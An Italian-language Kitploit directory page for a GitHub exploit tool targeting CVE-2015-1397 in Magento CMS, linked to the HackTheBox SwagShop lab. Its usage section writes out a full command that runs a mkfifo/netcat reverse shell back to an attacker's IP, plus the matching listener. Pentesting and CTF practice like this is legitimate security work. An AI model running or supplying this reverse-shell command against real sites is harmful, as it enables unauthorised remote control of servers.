Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/wytchwulf/cve-2015-1397-magento-shoplift
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCTFPenetration Testing
GitHubwytchwulf/cve-2015-1397-magento-shoplift

CVE-2015-1397-Magento-Shoplift

Script di exploit per CVE-2015-1397 in Magento CMS, inclusi un exploit pre-autenticazione per ottenere credenziali admin e un modulo RCE post-autenticazione per l'esecuzione di reverse shell.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
12 anni faNon ancora revisionato
Condividi

CVE-2015-1397-Magento-Shoplift

Dettagli della vulnerabilità

Vulnerabilità come vista in HackTheBox - SwagShop

Fase 1 = exploit.py

Ottieni le credenziali di amministratore per il pannello di controllo di Magento CMS

Fase 2 = post_auth.py

Con le credenziali ottenute da exploit.py aggiunte a post_auth.py esegui:

root@kitploit:~
python3 post_auth.py http://TARGET.SITE/index.php/admin "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc YOUR_IP 4444 >/tmp/f"

Ascoltatore:

root@kitploit:~
nc -lvnp 4444
Scarica lo strumento